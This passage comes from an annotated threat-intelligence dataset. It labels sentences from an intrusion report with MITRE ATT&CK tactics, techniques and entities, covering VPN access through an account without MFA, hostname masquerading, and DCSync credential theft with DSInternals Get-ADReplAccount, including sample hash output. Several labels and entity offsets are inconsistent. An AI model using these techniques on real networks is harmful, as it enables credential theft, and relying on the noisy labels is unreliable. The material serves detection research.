Discovery" } ], "procedure": "The threat actor repeatedly used remote process listing to target specific remote systems owned by individuals with cloud access they were interested in.", "entities": [ { "text": "threat actor", "start": 120, "end": 132, "label": "ThreatActor" }, { "text": "remote systems", "start": 172, "end": 186, "label": "Infrastructure_Indicator" }, { "text": "cloud access ", "start": 268, "end": 281, "label": "Infrastructure_Indicator" }, { "text": "used by the threat actor", "start": 108, "end": 132, "label": "Action" }, { "text": "targeting the same or similar lists ", "start": 133, "end": 169, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s159-7e1d08", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 159, "context_before": "A sample of the information included with this event is below:\nThis remote process listing was consistently used by the threat actor targeting the same or similar lists of remote systems, and the owners of the targeted systems also happened to be the individuals with cloud access that the threat actor was interested in.", "sentence_text": "While unproven, it’s possible the threat actor was running tasklist remotely on these systems specifically to see which of the target systems was running Google Chrome.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Possibly attempted to run tasklist remotely on systems to check which were running Google Chrome.", "entities": [ { "text": " threat actor ", "start": 33, "end": 47, "label": "ThreatActor" }, { "text": " tasklist ", "start": 58, "end": 68, "label": "MalwareTool" }, { "text": "Google Chrome", "start": 154, "end": 167, "label": "MalwareTool" }, { "text": "target systems ", "start": 127, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "running Google Chrome", "start": 146, "end": 167, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s160-0ebf87", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 160, "context_before": "While unproven, it’s possible the threat actor was running tasklist remotely on these systems specifically to see which of the target systems was running Google Chrome.", "sentence_text": "This is because a current or recent Chrome session to the victim’s cloud tenants would be potentially beneficial in the hijacking of sessions that the threat actor performed in order to access the victim’s cloud resources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s161-687e8d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 161, "context_before": "This is because a current or recent Chrome session to the victim’s cloud tenants would be potentially beneficial in the hijacking of sessions that the threat actor performed in order to access the victim’s cloud resources.", "sentence_text": "Logs on the servers indicated that the threat actor attempted to log in with multiple valid accounts and in several cases was successful.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078.002", "name": "Domain Accounts" } ], "procedure": "The threat actor attempted and in some cases succeeded in logging into multiple valid accounts", "entities": [ { "text": "threat actor ", "start": 39, "end": 52, "label": "ThreatActor" }, { "text": "attempted to log in ", "start": 52, "end": 72, "label": "Action" }, { "text": "Logs", "start": 0, "end": 4, "label": "Infrastructure_Indicator" }, { "text": " servers ", "start": 11, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "multiple valid accounts ", "start": 77, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s162-8ed076", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 162, "context_before": "Logs on the servers indicated that the threat actor attempted to log in with multiple valid accounts and in several cases was successful.", "sentence_text": "There was little to no activity during the (S)FTP sessions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s163-0b4a63", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 163, "context_before": "There was little to no activity during the (S)FTP sessions.", "sentence_text": "This likely was an exercise in attempting to identify misconfigured (S)FTP accounts that also had shell access, similar to what’s described in the Credential Hopping section earlier.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s164-25fb11", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 164, "context_before": "This likely was an exercise in attempting to identify misconfigured (S)FTP accounts that also had shell access, similar to what’s described in the Credential Hopping section earlier.", "sentence_text": "Some of the accounts used were not in the victim’s Active Directory, as these were accounts for customers of the victim and stored in a separate LDAP database.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078.003", "name": "Local Accounts" } ], "procedure": "Some accounts used by the attacker originated from outside Active Directory and were stored in a separate LDAP database.", "entities": [ { "text": "Active Directory", "start": 51, "end": 67, "label": "Infrastructure_Indicator" }, { "text": " customers", "start": 95, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "separate LDAP database", "start": 136, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "stored in a separate LDAP database", "start": 124, "end": 158, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s165-77a353", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 165, "context_before": "Some of the accounts used were not in the victim’s Active Directory, as these were accounts for customers of the victim and stored in a separate LDAP database.", "sentence_text": "After confirming the FTP accounts did not provide shell access into the environment, the threat actor began attempting to connect into the environment via VPN.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "The threat actor, unable to gain shell access through FTP accounts, attempted to connect to the environment via VPN.", "entities": [ { "text": " threat actor ", "start": 88, "end": 102, "label": "ThreatActor" }, { "text": "VPN", "start": 155, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "began attempting to connect into the environment", "start": 102, "end": 150, "label": "Action" }, { "text": "FTP accounts", "start": 21, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "shell access ", "start": 50, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s166-31f7fb", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 166, "context_before": "After confirming the FTP accounts did not provide shell access into the environment, the threat actor began attempting to connect into the environment via VPN.", "sentence_text": "Eventually, the threat actor attempted an account that they had the correct password for but that had not been set up with MFA.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The threat actor attempted to authenticate using an account with a valid password but without MFA enabled.", "entities": [ { "text": "threat actor", "start": 16, "end": 28, "label": "ThreatActor" }, { "text": "correct password", "start": 68, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "MFA", "start": 123, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "attempted an account ", "start": 29, "end": 50, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s167-b64868", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 167, "context_before": "Eventually, the threat actor attempted an account that they had the correct password for but that had not been set up with MFA.", "sentence_text": "This resulted in a prompt being displayed to the threat actor that included an MFA setup link.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "A prompt with an MFA setup link was displayed to the threat actor", "entities": [ { "text": "threat actor", "start": 49, "end": 61, "label": "ThreatActor" }, { "text": "MFA setup link", "start": 79, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "prompt", "start": 19, "end": 25, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s168-5e03db", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 168, "context_before": "This resulted in a prompt being displayed to the threat actor that included an MFA setup link.", "sentence_text": "The threat actor subsequently set up MFA for the account and successfully connected to the victim’s network via VPN.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "The threat actor configured MFA on the account and then connected to the victim’s network using VPN.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "MFA", "start": 37, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "VPN", "start": 112, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "victim’s network ", "start": 91, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "set up MFA ", "start": 30, "end": 41, "label": "Action" }, { "text": "connected to the victim’s network", "start": 74, "end": 107, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s169-3fffd7", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 169, "context_before": "The threat actor subsequently set up MFA for the account and successfully connected to the victim’s network via VPN.", "sentence_text": "TA Masquerading of System Names During the attempted and successful VPN authentications described above, the threat actor ensured the hostname of their system matched the naming convention of hostnames in the victim’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "The threat actor altered their system hostname to mimic the victim’s naming convention during VPN authentication.", "entities": [ { "text": "threat actor", "start": 109, "end": 121, "label": "ThreatActor" }, { "text": "VPN authentications", "start": 68, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "hostname", "start": 134, "end": 142, "label": "Infrastructure_Indicator" }, { "text": "naming convention of hostnames in the victim’s environment", "start": 171, "end": 229, "label": "Action" }, { "text": "ensured the hostname of their system matched the naming convention", "start": 122, "end": 188, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s170-17e8ff", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 170, "context_before": "TA Masquerading of System Names During the attempted and successful VPN authentications described above, the threat actor ensured the hostname of their system matched the naming convention of hostnames in the victim’s environment.", "sentence_text": "This again showed a strong knowledge of the victim’s internal environment on the part of the threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s171-0f76ee", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 171, "context_before": "This again showed a strong knowledge of the victim’s internal environment on the part of the threat actor.", "sentence_text": "This masqueraded hostname technique has been observed at multiple StellarParticle-related investigations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "The masqueraded hostname technique was observed in multiple StellarParticle-related investigations", "entities": [ { "text": "StellarParticle", "start": 66, "end": 81, "label": "ThreatActor" }, { "text": "masqueraded hostname technique", "start": 5, "end": 35, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s172-f2c449", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 172, "context_before": "This masqueraded hostname technique has been observed at multiple StellarParticle-related investigations.", "sentence_text": "Credential Theft Using Get-ADReplAccount In one example, the threat actor connected into the victim’s environment via a VPN endpoint that did not have MFA enabled.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "The threat actor connected to the victim’s environment through a VPN endpoint without MFA", "entities": [ { "text": " threat actor ", "start": 60, "end": 74, "label": "ThreatActor" }, { "text": "VPN endpoint ", "start": 120, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "MFA", "start": 151, "end": 154, "label": "Infrastructure_Indicator" }, { "text": " victim’s environment", "start": 92, "end": 113, "label": "Action" }, { "text": "connected into the victim’s environment", "start": 74, "end": 113, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s173-b46079", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 173, "context_before": "Credential Theft Using Get-ADReplAccount In one example, the threat actor connected into the victim’s environment via a VPN endpoint that did not have MFA enabled.", "sentence_text": "Once connected to the VPN, the threat actor connected via Remote Desktop to a Domain Controller and copied the DSInternals PowerShell module to the system.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "The threat actor used Remote Desktop to access a Domain Controller and copied the DSInternals PowerShell module onto the system.", "entities": [ { "text": "threat actor ", "start": 31, "end": 44, "label": "ThreatActor" }, { "text": "Remote Desktop", "start": 58, "end": 72, "label": "MalwareTool" }, { "text": "DSInternals", "start": 111, "end": 122, "label": "MalwareTool" }, { "text": "PowerShell module ", "start": 123, "end": 141, "label": "MalwareTool" }, { "text": "VPN", "start": 22, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "Domain Controller ", "start": 78, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "system", "start": 148, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "connected via Remote Desktop", "start": 44, "end": 72, "label": "Action" }, { "text": "copied the DSInternals PowerShell module to the system", "start": 100, "end": 154, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s174-081e60", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 174, "context_before": "Once connected to the VPN, the threat actor connected via Remote Desktop to a Domain Controller and copied the DSInternals PowerShell module to the system.", "sentence_text": "The threat actor subsequently ran the DSInternals command Get-ADReplAccount targeting two of the victim’s domains.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "The threat actor used DSInternals PowerShell command Get-ADReplAccount on a Domain Controller to extract account replication data from the victim’s domains.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "ran the DSInternals command Get-ADReplAccount", "start": 30, "end": 75, "label": "Action" }, { "text": "DSInternals", "start": 38, "end": 49, "label": "MalwareTool" }, { "text": "victim’s domains", "start": 97, "end": 113, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s175-f4dac3", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 175, "context_before": "The threat actor subsequently ran the DSInternals command Get-ADReplAccount targeting two of the victim’s domains.", "sentence_text": "This command uses the Microsoft Directory Replication Service (MS-DRSR) protocol and specifically the IDL_DRSGetNCChanges method to return account information from Active Directory such as the current NTLM password hashes and previous password hashes used for enforcing password reuse restrictions.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "The command queries Active Directory via MS-DRSR and IDL_DRSGetNCChanges to retrieve NTLM password hashes", "entities": [ { "text": "IDL_DRSGetNCChanges method ", "start": 102, "end": 129, "label": "MalwareTool" }, { "text": "Microsoft Directory Replication Service (MS-DRSR) protocol ", "start": 22, "end": 81, "label": "MalwareTool" }, { "text": "Active Directory", "start": 164, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "NTLM password hashes", "start": 201, "end": 221, "label": "Infrastructure_Indicator" }, { "text": "previous password hashes", "start": 226, "end": 250, "label": "Infrastructure_Indicator" }, { "text": "eturn account information from Active Director", "start": 133, "end": 179, "label": "Action" }, { "text": "uses the Microsoft Directory Replication Service (MS-DRSR) protocol ", "start": 13, "end": 81, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s176-8c27b5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 176, "context_before": "This command uses the Microsoft Directory Replication Service (MS-DRSR) protocol and specifically the IDL_DRSGetNCChanges method to return account information from Active Directory such as the current NTLM password hashes and previous password hashes used for enforcing password reuse restrictions.", "sentence_text": "A common name for this particular technique is DCSync.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s177-217285", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 177, "context_before": "A common name for this particular technique is DCSync.", "sentence_text": "An example output from Get-AdReplAccount is below:\nDistinguishedName: CN=TestUser,OU=Admins,OU=Users,DC=demo,DC=local\nSid: S-1-5-21-1432446722-301123485-1266542393-2012\nGuid: 12321930-7c05-4011-8a3e-e0b9b6e04567\nSamAccountName: TestUser\nSamAccountType: User\nUserPrincipalName: TestUser@demo.local\nPrimaryGroupId: 513\nSidHistory:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s178-b5a47c", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 178, "context_before": "An example output from Get-AdReplAccount is below:\nDistinguishedName: CN=TestUser,OU=Admins,OU=Users,DC=demo,DC=local\nSid: S-1-5-21-1432446722-301123485-1266542393-2012\nGuid: 12321930-7c05-4011-8a3e-e0b9b6e04567\nSamAccountName: TestUser\nSamAccountType: User\nUserPrincipalName: TestUser@demo.local\nPrimaryGroupId: 513\nSidHistory:", "sentence_text": "Test Surname: User Description: Admin Account ServicePrincipalName:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s179-c684ff", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 179, "context_before": "Test Surname: User Description: Admin Account ServicePrincipalName:", "sentence_text": "SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited, DiscretionaryAclProtected, SelfRelative Owner: S-1-5-21-1432446722-301123485-1266542393-512 Secrets NTHash: 84a058676bb6d7de4237e18f09b91156 LMHash:\nNTHashHistory:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s180-0f8e3d", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 180, "context_before": "SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited, DiscretionaryAclProtected, SelfRelative Owner: S-1-5-21-1432446722-301123485-1266542393-512 Secrets NTHash: 84a058676bb6d7de4237e18f09b91156 LMHash:\nNTHashHistory:", "sentence_text": "Hash 01: 84a058676bb6d7de4237e18f09b91156 Hash 02: e047ebb3b7c463928c928fca95ac0ac8 Hash 03: 6dc3cdb3e559ef00d3521351ace7477e Hash 04: a88355849f35fe7336de23a4ca3e6a9e Hash 05: de9bde95677672295349aa6e1e857704 LMHashHistory:\nHash 01: 12227358dd7013c7dbdbd8fdcc0c6668 Hash 02: 6a028636a6f52491424586bb88357f7c Hash 03: c13ef7347853dc3be7e7259fdc8818a1 Hash 04: 6635151746869ce485246037747adae1 Hash 05: 85543f498b007e07a3da662c8a9d450b SupplementalCredentials:\nClearText:\nNTLMStrongHash: de164e3465f163e846a5e1c22a5ac649\nKerberos:\nCredentials:\nDES_CBC_MD5\nKey: 0013364f00003915\nDES_CBC_CRC\nKey: 0013364f00003915\nOldCredentials:\nDES_CBC_MD5\nKey: 00002a46000004bc\nDES_CBC_CRC\nKey: 00002a46000004bc\nSalt: demo.localTestUser\nFlags: 0\nKerberosNew:\nCredentials:\nAES256_CTS_HMAC_SHA1_96\nKey: afd4d60e8d0920bc2f94d551f62f0ea2a17523bf2ff8ffb0fdade2a90389282f\nIterations: 4096\nAES128_CTS_HMAC_SHA1_96\nKey: f67c2bcbfcfa30fccb36f72dca22a817\nIterations: 4096\nDES_CBC_MD5\nKey: 00002f34000004ee\nIterations: 4096\nDES_CBC_CRC\nKey: 00002f34000004ee\nIterations: 4096\nOldCredentials:\nAES256_CTS_HMAC_SHA1_96\nKey: b430783ab4c957cf6a03d3d348af27264c0d872932650ffca712d9ebcf778b9f\nIterations: 4096\nAES128_CTS_HMAC_SHA1_96\nKey: dc34bfd5e469edbeada77fac56aa35ae\nIterations: 4096\nDES_CBC_MD5\nKey: 0000345400000520\nIterations: 4096\nDES_CBC_CRC\nKey: 0000345400000520\nIterations: 4096\nOlderCredentials:\nAES256_CTS_HMAC_SHA1_96\nKey: 26efd3593712e555f8366bb4b8aff097d09acd93c3a1b6d4ea03c578aad9e087\nIterations: 4096\nAES128_CTS_HMAC_SHA1_96\nKey: c38dfbd6c00b5f3b010a07f9e824fc38\nIterations: 4096\nDES_CBC_MD5\nKey: 000039a500000551\nIterations: 4096\nDES_CBC_CRC\nKey: 000039a500000551\nIterations: 4096\nServiceCredentials:\nSalt: demo.localTestUser\nDefaultIterationCount: 4096\nFlags: 0\nWDigest:\nHash 01: 83ed141ab0eaf1ff7694147ba97e1994 Hash 02: e73a8c05d4a7df53774bfa7ef8f0f574 Hash 03: 0c228c5816a79e561d999d489499a12a Hash 04: 83ed141ab0eaf1ff7694147ba97e1994 Hash 05: e73a8c05d4a7df53774bfa7ef8f0f574 Hash 06: 4e7c5ec6ffb6100f0c7f0bc57749bc93 Hash 07: 83ed141ab0eaf1ff7694147ba97e1994 Hash 08: 10265b08a3bb710da516832eaf64368a Hash 09: 10265b08a3bb710da516832eaf64368a Key Credentials:\nCredential Roaming\nCreated:\nModified:\nCredentials:\nWhen executing the Get-ADReplAccount command, the threat actor specified the AD context to be targeted via the NamingContext parameter.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "The threat actor executed Get-ADReplAccount and specified the targeted AD context using the NamingContext parameter.", "entities": [ { "text": "threat actor ", "start": 2252, "end": 2265, "label": "ThreatActor" }, { "text": "Get-ADReplAccount ", "start": 2221, "end": 2239, "label": "MalwareTool" }, { "text": "NamingContext parameter.", "start": 2313, "end": 2337, "label": "MalwareTool" }, { "text": "argeted ", "start": 2297, "end": 2305, "label": "Action" }, { "text": " t", "start": 2295, "end": 2297, "label": "Action" }, { "text": "Hash 01: 83ed141ab0eaf1ff7694147ba97e1994 Hash 02: e73a8c05d4a7df53774bfa7ef8f0f574 Hash 03: 0c228c5816a79e561d999d489499a12a Hash 04: 83ed141ab0eaf1ff7694147ba97e1994 Hash 05: e73a8c05d4a7df53774bfa7ef8f0f574 Hash 06: 4e7c5ec6ffb6100f0c7f0bc57749bc93 Hash 07: 83ed141ab0eaf1ff7694147ba97e1994 Hash 08: 10265b08a3bb710da516832eaf64368a Hash 09: 10265b08a3bb710da516832eaf64368a ", "start": 1756, "end": 2134, "label": "Infrastructure_Indicator" }, { "text": "AD context ", "start": 2279, "end": 2290, "label": "Infrastructure_Indicator" }, { "text": "LMHashHistory", "start": 210, "end": 223, "label": "Infrastructure_Indicator" }, { "text": "WDigest", "start": 1747, "end": 1754, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s181-40f111", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 181, "context_before": "Hash 01: 84a058676bb6d7de4237e18f09b91156 Hash 02: e047ebb3b7c463928c928fca95ac0ac8 Hash 03: 6dc3cdb3e559ef00d3521351ace7477e Hash 04: a88355849f35fe7336de23a4ca3e6a9e Hash 05: de9bde95677672295349aa6e1e857704 LMHashHistory:\nHash 01: 12227358dd7013c7dbdbd8fdcc0c6668 Hash 02: 6a028636a6f52491424586bb88357f7c Hash 03: c13ef7347853dc3be7e7259fdc8818a1 Hash 04: 6635151746869ce485246037747adae1 Hash 05: 85543f498b007e07a3da662c8a9d450b SupplementalCredentials:\nClearText:\nNTLMStrongHash: de164e3465f163e846a5e1c22a5ac649\nKerberos:\nCredentials:\nDES_CBC_MD5\nKey: 0013364f00003915\nDES_CBC_CRC\nKey: 0013364f00003915\nOldCredentials:\nDES_CBC_MD5\nKey: 00002a46000004bc\nDES_CBC_CRC\nKey: 00002a46000004bc\nSalt: demo.localTestUser\nFlags: 0\nKerberosNew:\nCredentials:\nAES256_CTS_HMAC_SHA1_96\nKey: afd4d60e8d0920bc2f94d551f62f0ea2a17523bf2ff8ffb0fdade2a90389282f\nIterations: 4096\nAES128_CTS_HMAC_SHA1_96\nKey: f67c2bcbfcfa30fccb36f72dca22a817\nIterations: 4096\nDES_CBC_MD5\nKey: 00002f34000004ee\nIterations: 4096\nDES_CBC_CRC\nKey: 00002f34000004ee\nIterations: 4096\nOldCredentials:\nAES256_CTS_HMAC_SHA1_96\nKey: b430783ab4c957cf6a03d3d348af27264c0d872932650ffca712d9ebcf778b9f\nIterations: 4096\nAES128_CTS_HMAC_SHA1_96\nKey: dc34bfd5e469edbeada77fac56aa35ae\nIterations: 4096\nDES_CBC_MD5\nKey: 0000345400000520\nIterations: 4096\nDES_CBC_CRC\nKey: 0000345400000520\nIterations: 4096\nOlderCredentials:\nAES256_CTS_HMAC_SHA1_96\nKey: 26efd3593712e555f8366bb4b8aff097d09acd93c3a1b6d4ea03c578aad9e087\nIterations: 4096\nAES128_CTS_HMAC_SHA1_96\nKey: c38dfbd6c00b5f3b010a07f9e824fc38\nIterations: 4096\nDES_CBC_MD5\nKey: 000039a500000551\nIterations: 4096\nDES_CBC_CRC\nKey: 000039a500000551\nIterations: 4096\nServiceCredentials:\nSalt: demo.localTestUser\nDefaultIterationCount: 4096\nFlags: 0\nWDigest:\nHash 01: 83ed141ab0eaf1ff7694147ba97e1994 Hash 02: e73a8c05d4a7df53774bfa7ef8f0f574 Hash 03: 0c228c5816a79e561d999d489499a12a Hash 04: 83ed141ab0eaf1ff7694147ba97e1994 Hash 05: e73a8c05d4a7df53774bfa7ef8f0f574 Hash 06: 4e7c5ec6ffb6100f0c7f0bc57749bc93 Hash 07: 83ed141ab0eaf1ff7694147ba97e1994 Hash 08: 10265b08a3bb710da516832eaf64368a Hash 09: 10265b08a3bb710da516832eaf64368a Key Credentials:\nCredential Roaming\nCreated:\nModified:\nCredentials:\nWhen executing the Get-ADReplAccount command, the threat actor specified the AD context to be targeted via the NamingContext parameter.", "sentence_text": "This was necessary, as the threat actor was targeting multiple domains.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "The threat actor targeted multiple domains.", "entities": [ { "text": "threat actor", "start": 27, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "multiple domains", "start": 54, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "targeting multiple domains", "start": 44, "end": 70, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s182-65c19f", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 182, "context_before": "This was necessary, as the threat actor was targeting multiple domains.", "sentence_text": "The resulting output of each command was redirected to a text file and compressed as zip archives before exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560.001", "name": "Archive via Utility" } ], "procedure": "The attacker redirected command output to text files, compressed them into zip archives, and prepared them for exfiltration.", "entities": [ { "text": "redirected to a text file ", "start": 41, "end": 67, "label": "Action" }, { "text": "compressed ", "start": 71, "end": 82, "label": "Action" }, { "text": "exfiltration", "start": 105, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "zip archives", "start": 85, "end": 97, "label": "Infrastructure_Indicator" }, { "text": " text file", "start": 56, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-84_mitre_report-p1-s183-9465f9", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 183, "context_before": "The resulting output of each command was redirected to a text file and compressed as zip archives before exfiltration.", "sentence_text": "The fact that Get-ADReplAccount command includes not only the current NTLM hashes but also the hash history (i.e., hashes of previous passwords used by a user account) meant that the threat actor also had the ability to discover accounts that either reused the same passwords or used similar passwords when the account password was changed.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "Get-ADReplAccount provided NTLM hashes and hash history, giving the threat actor the ability to discover accounts with reused or similar passwords.", "entities": [ { "text": " threat actor ", "start": 182, "end": 196, "label": "ThreatActor" }, { "text": "Get-ADReplAccount command ", "start": 14, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "NTLM hashes", "start": 70, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "hash history", "start": 95, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "previous passwords ", "start": 125, "end": 144, "label": "Infrastructure_Indicator" }, { "text": "discover accounts", "start": 220, "end": 237, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s184-3133c5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 184, "context_before": "The fact that Get-ADReplAccount command includes not only the current NTLM hashes but also the hash history (i.e., hashes of previous passwords used by a user account) meant that the threat actor also had the ability to discover accounts that either reused the same passwords or used similar passwords when the account password was changed.", "sentence_text": "Credential Refresh\nOn some investigations, the dwell time of the threat actor spanned years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s185-713311", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 185, "context_before": "Credential Refresh\nOn some investigations, the dwell time of the threat actor spanned years.", "sentence_text": "Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s186-ee564a", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 186, "context_before": "Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations.", "sentence_text": "To combat this, the threat actor periodically \"refreshed\" their credential set by performing credential theft activities in an already compromised environment.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "The threat actor periodically refreshed their credential set by conducting credential theft inside the compromised environment", "entities": [ { "text": "threat actor ", "start": 20, "end": 33, "label": "ThreatActor" }, { "text": "refreshed", "start": 47, "end": 56, "label": "Action" }, { "text": "performing 